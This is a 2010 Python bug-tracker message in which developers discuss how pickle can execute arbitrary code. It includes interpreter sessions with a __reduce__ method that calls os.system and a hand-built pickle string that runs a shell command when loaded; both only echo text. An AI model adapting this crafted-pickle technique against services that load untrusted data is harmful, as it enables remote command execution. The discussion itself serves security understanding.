Message112475
M.-A. Lemburg wrote:
> Jean-Paul Calderone wrote:
>>
>> Jean-Paul Calderone <exarkun@twistedmatrix.com> added the comment:
>>
>> For example:
>>
>> exarkun@boson:~$ python
>> Python 2.6.4 (r264:75706, Dec 7 2009, 18:45:15)
>> [GCC 4.4.1] on linux2
>> Type "help", "copyright", "credits" or "license" for more information.
>>>>> class x(object):
>> ... def __reduce__(self):
>> ... import os
>> ... return os.system, ('echo "Hello from sploitland"',)
>> ...
>>>>> import pickle
>>>>> pickle.loads(pickle.dumps(x()))
>> Hello from sploitland
>> 0
>
> But here you are not transferring malicious code in the pickle
> string, you are just triggering the execution of such code that
> you already have (and are in control of).
>
> Without the definition of class x on the receiving side, there
> would be no exploit.
>
> By adding support for pickling code objects, you'd make it possible
> to place the definition of class x into the pickle string and
> you would no longer be in control of that code.
Hmm, I just tried the code and it seems that you're right:
The pickle string does not contain a reference to class x,
but only the name of the function to call. Wow, that's a huge
hole in Python's pickle system...
... def __reduce__(self):
... import os
... return os.system, ('echo "Bingo"',)
...
>>> import pickle
>>> pickle.dumps(C())
'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'
>>> C = None
>>> s = 'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'
>>> pickle.loads(s)
Bingo
0 |
|
Date |
User |
Action |
Args |
2010-08-02 14:11:31 | lemburg | set | recipients:
+ lemburg, exarkun, belopolsky, pitrou, alexandre.vassalotti |
2010-08-02 14:11:29 | lemburg | link | issue9276 messages |
2010-08-02 14:11:29 | lemburg | create | |
|